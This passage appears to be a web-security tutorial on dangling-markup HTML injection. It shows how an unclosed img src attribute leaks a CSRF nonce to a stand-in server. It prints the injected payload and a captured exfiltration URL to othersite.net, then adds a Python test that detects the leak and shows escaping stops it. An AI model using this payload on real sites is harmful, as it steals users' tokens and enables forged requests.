If the same-origin policy means that all the actions have to be performed from a specific domain, we can inject HTML code into any part of the application in order to execute those actions from that domain. These HTML injections don't necessarily need to go into a vulnerable field: if we take a look, the application itself may allow HTML somewhere, for example in an email, where we can add some HTML, or in a board message, where HTML is allowed in a comment. Let's check out the following code as an example:
<form action="http://www.testsite.com/action.php" method="POST">
    <input type="hidden" name="nonce" value="2230313740821">
    <input type="submit" value="Forward">
    ...
</form>
...
<script>
    var _StatsTrackerId='AABBCCDDEEFF';
    ...
</script>
If we have this vulnerable form, we can try an HTML injection that uses an <img> tag whose src attribute is never closed, so that the browser sends the markup that follows it, nonce included, to a server we control as part of the image URL. The request captured on that server looks like this, for example:
http://othersite.net/capture?html=<form%20action="http://www.testsite.com/action.php"%20method="POST"><input%20type="hidden"%20name="nonce"%20value="2230313740821"><input%20type="submit"%20value="Forward">...</form>...<script>var%20_StatsTrackerId=
If the application tries to validate the domain, the check will pass, because the request is generated from othersite.net, while the real request is made to testsite.com.
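The following Python script is an added illustration, not code from the original text: it renders a board page that prints a user comment above the nonce-protected form shown earlier, feeds the result to Python's tolerant html.parser (which, like a browser, ends a single-quoted attribute value at the next single quote), and reports any off-site URL attribute that carries the nonce. With the comment left unescaped, the unclosed src attribute swallows the rest of the page up to the quote inside the script block, which is exactly what the captured request above shows; with html.escape applied to the comment, no leak is found. The names render_page, find_leaks, DANGLING_COMMENT and the page layout are constructed for this example.

```python
# Added example (not from the original text): shows how an unclosed
# single-quoted src attribute in user-supplied HTML swallows the page's
# CSRF nonce into an off-site URL, and how escaping the input stops it.
# render_page, find_leaks, DANGLING_COMMENT and the page layout are
# constructed for this illustration.
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

NONCE = "2230313740821"            # the nonce value of the form on the page
TRUSTED_HOST = "www.testsite.com"  # the only host a URL on this page may target

# Markup that follows the comment, modelled on the form shown above.
PAGE_TAIL = (
    '<form action="http://www.testsite.com/action.php" method="POST">'
    f'<input type="hidden" name="nonce" value="{NONCE}">'
    '<input type="submit" value="Forward"></form>'
    "<script>var _StatsTrackerId='AABBCCDDEEFF';</script>"
)

# Constructed comment: the src value is opened with a single quote and never
# closed, so the parser takes everything up to the next single quote (the one
# inside the <script> block) as part of the image URL.
DANGLING_COMMENT = "<img src='http://othersite.net/capture?html="


def render_page(comment: str, escape_input: bool) -> str:
    """Render the board page; escape_input decides whether the comment is HTML-escaped."""
    body = escape(comment, quote=True) if escape_input else comment
    return f"<html><body><div class='comment'>{body}</div>{PAGE_TAIL}</body></html>"


class LeakFinder(HTMLParser):
    """Record URL attributes that point off-site and contain the secret."""

    URL_ATTRS = {"src", "href", "action", "formaction"}

    def __init__(self, secret: str):
        super().__init__()
        self.secret = secret
        self.leaks = []  # (tag, attribute, host) triples

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in self.URL_ATTRS or not value:
                continue
            host = urlparse(value).hostname
            # A URL on a foreign host that carries the nonce is a leak.
            if host and host != TRUSTED_HOST and self.secret in value:
                self.leaks.append((tag, name, host))


def find_leaks(page: str, secret: str = NONCE):
    """Parse the rendered page as a tolerant HTML parser does and return the leaks found."""
    finder = LeakFinder(secret)
    finder.feed(page)
    finder.close()
    return finder.leaks


if __name__ == "__main__":
    for escaped in (False, True):
        page = render_page(DANGLING_COMMENT, escape_input=escaped)
        print("escaped" if escaped else "raw", "->", find_leaks(page))
```

The check in LeakFinder is the kind of assertion a rendering test can run over every template that prints untrusted content next to a CSRF token: the nonce must never end up inside a URL attribute that points off-site. Escaping the comment with html.escape (quote=True) turns the injected quote into an entity, so no attribute is opened and the form and its nonce are parsed as the page intended.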